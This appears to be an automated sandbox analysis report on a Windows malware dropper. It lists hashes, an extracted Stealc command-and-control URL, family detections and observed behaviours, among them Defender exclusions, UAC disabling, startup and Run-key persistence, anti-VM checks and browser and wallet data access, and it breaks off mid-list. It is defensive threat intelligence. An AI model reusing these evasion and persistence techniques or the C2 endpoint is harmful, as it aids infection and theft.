Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
29-04-2024 18:34
Static task
static1
Behavioral task
behavioral1
Sample
3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe
Resource
win10v2004-20240419-en
General
-
Target
3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe
-
Size
2.9MB
-
MD5
41d6a9f69dd2dc30c2fea8bdfdfcabd8
-
SHA1
6215b290031d78b512a15ce5adcfbda308fc81d9
-
SHA256
3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3
-
SHA512
01d5352a98baa2c4da13a8e057a78c3f4f7a338b35a1e572c5c1d82fd1a9a1faa80cf806c2c606080fc9e854301d60160e9d7cbd0c2174236ab8ff9f80e09109
-
SSDEEP
49152:QzBfc7DLHlksH8ZDHepCsBST3P+NRYNuP/bAq++ub8kLpkLq/XrmCGjtRs:QzuTk8ALPMRsu7v+URm/XwHs
Malware Config
Extracted
stealc
http://185.172.128.150
-
url_path
/c698e1bc8a2f5e6d.php
Signatures
-
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3936-1033-0x000001BA4CE50000-0x000001BA50748000-memory.dmp family_zgrat_v1 behavioral2/memory/3936-1034-0x000001BA6AFF0000-0x000001BA6B100000-memory.dmp family_zgrat_v1 behavioral2/memory/3936-1038-0x000001BA6AC80000-0x000001BA6ACA4000-memory.dmp family_zgrat_v1 -
Glupteba payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3724-786-0x0000000000400000-0x0000000002ED3000-memory.dmp family_glupteba behavioral2/memory/3976-782-0x0000000000400000-0x0000000002ED3000-memory.dmp family_glupteba behavioral2/memory/3976-789-0x0000000000400000-0x0000000002ED3000-memory.dmp family_glupteba behavioral2/memory/3724-793-0x0000000000400000-0x0000000002ED3000-memory.dmp family_glupteba behavioral2/memory/1460-1138-0x0000000000400000-0x0000000002ED3000-memory.dmp family_glupteba behavioral2/memory/1948-1139-0x0000000000400000-0x0000000002ED3000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
cZ66OwyuU2YlIR1ARlg2uowi.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" cZ66OwyuU2YlIR1ARlg2uowi.exe -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5072-1067-0x0000000000B00000-0x0000000000BC6000-memory.dmp family_sectoprat -
Processes:
3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe -
Processes:
3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.execZ66OwyuU2YlIR1ARlg2uowi.exelTSs1ST8HHlAZfEbkonjc9k7.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe = "0" 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" cZ66OwyuU2YlIR1ARlg2uowi.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" lTSs1ST8HHlAZfEbkonjc9k7.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
cZ66OwyuU2YlIR1ARlg2uowi.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cZ66OwyuU2YlIR1ARlg2uowi.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 59 1764 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 4940 netsh.exe 1484 netsh.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
cZ66OwyuU2YlIR1ARlg2uowi.exeInstall.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cZ66OwyuU2YlIR1ARlg2uowi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cZ66OwyuU2YlIR1ARlg2uowi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
AWLfpbu.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Control Panel\International\Geo\Nation AWLfpbu.exe -
Drops startup file 7 IoCs
Processes:
CasPol.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AYHRhQC56qhihcQLSSJ0Zfne.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OsPv1ECmsU57j62LkGQwzzdR.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dkMwUz2e5wMSXVgI8tJslvza.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oum50udMyhIjtj0AwjoBVt8M.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\089vM9RZe0Q4fyCfhuMQoFR9.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gDL2keoV4qBYbu0A0v3xDjM4.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kqbc16wBueuwHkHR7FSlb99y.bat CasPol.exe -
Executes dropped EXE 22 IoCs
Processes:
rYQHmcFpMZCI2lLMVlsQIqov.exe2QqwdmEprG41dAF4eJbsw6U9.exelTSs1ST8HHlAZfEbkonjc9k7.exek9N2iLGgH5IXrwnqkCfnYGEa.exe88ZAQZnLv9RZwKEYFq5E7vJ2.exe88ZAQZnLv9RZwKEYFq5E7vJ2.exeInstall.exe88ZAQZnLv9RZwKEYFq5E7vJ2.exe88ZAQZnLv9RZwKEYFq5E7vJ2.exe88ZAQZnLv9RZwKEYFq5E7vJ2.execZ66OwyuU2YlIR1ARlg2uowi.exeInstall.exeAssistant_109.0.5097.45_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exeAWLfpbu.exeubk.0.exe2QqwdmEprG41dAF4eJbsw6U9.exelTSs1ST8HHlAZfEbkonjc9k7.exerun.exeubk.3.execsrss.exepid process 416 rYQHmcFpMZCI2lLMVlsQIqov.exe 3976 2QqwdmEprG41dAF4eJbsw6U9.exe 3724 lTSs1ST8HHlAZfEbkonjc9k7.exe 1028 k9N2iLGgH5IXrwnqkCfnYGEa.exe 1380 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 1996 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 5012 Install.exe 4076 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 1168 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 2668 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 4732 cZ66OwyuU2YlIR1ARlg2uowi.exe 2224 Install.exe 2696 Assistant_109.0.5097.45_Setup.exe_sfx.exe 5044 assistant_installer.exe 3912 assistant_installer.exe 4572 AWLfpbu.exe 860 ubk.0.exe 1460 2QqwdmEprG41dAF4eJbsw6U9.exe 1948 lTSs1ST8HHlAZfEbkonjc9k7.exe 1320 run.exe 1824 ubk.3.exe 4088 csrss.exe -
Loads dropped DLL 13 IoCs
Processes:
88ZAQZnLv9RZwKEYFq5E7vJ2.exe88ZAQZnLv9RZwKEYFq5E7vJ2.exe88ZAQZnLv9RZwKEYFq5E7vJ2.exe88ZAQZnLv9RZwKEYFq5E7vJ2.exe88ZAQZnLv9RZwKEYFq5E7vJ2.exeassistant_installer.exeassistant_installer.exerun.exerundll32.exeubk.0.exepid process 1380 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 1996 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 4076 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 1168 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 2668 88ZAQZnLv9RZwKEYFq5E7vJ2.exe 5044 assistant_installer.exe 5044 assistant_installer.exe 3912 assistant_installer.exe 3912 assistant_installer.exe 1320 run.exe 1764 rundll32.exe 860 ubk.0.exe 860 ubk.0.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\cZ66OwyuU2YlIR1ARlg2uowi.exe themida behavioral2/memory/4732-143-0x0000000140000000-0x0000000140786000-memory.dmp themida behavioral2/memory/4732-266-0x0000000140000000-0x0000000140786000-memory.dmp themida -
Processes:
3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.execZ66OwyuU2YlIR1ARlg2uowi.exelTSs1ST8HHlAZfEbkonjc9k7.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe = "0" 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" cZ66OwyuU2YlIR1ARlg2uowi.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" lTSs1ST8HHlAZfEbkonjc9k7.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
lTSs1ST8HHlAZfEbkonjc9k7.exe2QqwdmEprG41dAF4eJbsw6U9.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 2QqwdmEprG41dAF4eJbsw6U9.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.execZ66OwyuU2YlIR1ARlg2uowi.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cZ66OwyuU2YlIR1ARlg2uowi.exe -
Drops Chrome extension 2 IoCs
Processes:
AWLfpbu.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json AWLfpbu.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json AWLfpbu.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
Install.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
88ZAQZnLv9RZwKEYFq5E7vJ2.exe88ZAQZnLv9RZwKEYFq5E7vJ2.exedescription ioc process File opened (read-only) \??\F: 88ZAQZnLv9RZwKEYFq5E7vJ2.exe File opened (read-only) \??\D: 88ZAQZnLv9RZwKEYFq5E7vJ2.exe File opened (read-only) \??\F: 88ZAQZnLv9RZwKEYFq5E7vJ2.exe File opened (read-only) \??\D: 88ZAQZnLv9RZwKEYFq5E7vJ2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 5 api.myip.com 33 api.myip.com -
Drops file in System32 directory 43 IoCs
Processes:
AWLfpbu.exepowershell.exepowershell.exepowershell.execZ66OwyuU2YlIR1ARlg2uowi.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy cZ66OwyuU2YlIR1ARlg2uowi.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 AWLfpbu.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol AWLfpbu.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol cZ66OwyuU2YlIR1ARlg2uowi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA AWLfpbu.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini cZ66OwyuU2YlIR1ARlg2uowi.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI cZ66OwyuU2YlIR1ARlg2uowi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 AWLfpbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
cZ66OwyuU2YlIR1ARlg2uowi.exepid process 4732 cZ66OwyuU2YlIR1ARlg2uowi.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exerun.execmd.exedescription pid process target process PID 1360 set thread context of 5020 1360 3616b7cc732c6a0c15b2c8d5d2c2cf26d9e649d1e1b85fbe85b82889721fe9e3.exe CasPol.exe PID 1320 set thread context of 436 1320 run.exe cmd.exe PID 436 set thread context of 5072 436 cmd.exe MSBuild.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
lTSs1ST8HHlAZfEbkonjc9k7.exe2QqwdmEprG41dAF4eJbsw6U9.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN lTSs1ST8HHlAZfEbkonjc9k7.exe File opened (read-only) \??\VBoxMiniRdrDN 2QqwdmEprG41dAF4eJbsw6U9.exe -
Drops file in Program Files directory 14 IoCs
Processes:
AWLfpbu.exedescription ioc process File created C:\Program Files (x86)\epoBtGYzqLvU2\sKewMtaoSYlmT.dll AWLfpbu.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\qUFyLpx.dll AWLfpbu.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\hBsIYRj.xml AWLfpbu.exe File created C:\Program Files (x86)\ecOJmsgAHWlsC\fgVOaBY.xml AWLfpbu.exe File created C:\Program Files (x86)\zgoZGMcaU\KwtoYm.dll AWLfpbu.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi AWLfpbu.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak AWLfpbu.exe File created C:\Program Files (x86)\epoBtGYzqLvU2\hZiCXub.xml AWLfpbu.exe File created C:\Program Files (x86)\qIYKRzUEasUn\CqjDMPd.dll AWLfpbu.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi AWLfpbu.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak AWLfpbu.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja AWLfpbu.exe File created C:\Program Files (x86)\zgoZGMcaU\YQXzLYd.xml AWLfpbu.exe File created C:\Program Files (x86)\ecOJmsgAHWlsC\OynEXWa.dll AWLfpbu.exe -
Drops file in Windows directory 8 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exelTSs1ST8HHlAZfEbkonjc9k7.exe2QqwdmEprG41dAF4eJbsw6U9.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\yfARWRprRqUFWeTGf.job schtasks.exe File created C:\Windows\Tasks\JHJXtPPPvDXVqpH.job schtasks.exe File created C:\Windows\Tasks\aNyMQclguOCSCcjxm.job schtasks.exe File opened for modification C:\Windows\rss lTSs1ST8HHlAZfEbkonjc9k7.exe File created C:\Windows\rss\csrss.exe lTSs1ST8HHlAZfEbkonjc9k7.exe File opened for modification C:\Windows\rss 2QqwdmEprG41dAF4eJbsw6U9.exe File created C:\Windows\rss\csrss.exe 2QqwdmEprG41dAF4eJbsw6U9.exe File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 3704 416 WerFault.exe rYQHmcFpMZCI2lLMVlsQIqov.exe 1544 860 WerFault.exe ubk.0.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
ubk.3.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ubk.3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ubk.3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ubk.3.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
ubk.0.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ubk.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ubk.0.exe -
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2020 schtasks.exe 5016 schtasks.exe 2732 schtasks.exe 3688 schtasks.exe 1468 schtasks.exe 2244 schtasks.exe 4544 schtasks.exe 1880 schtasks.exe 3976 schtasks.exe 5056 schtasks.exe 4624 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exelTSs1ST8HHlAZfEbkonjc9k7.exepowershell.exepowershell.exepowershell.exepowershell.exeAWLfpbu.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" lTSs1ST8HHlAZfEbkonjc9k7.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created 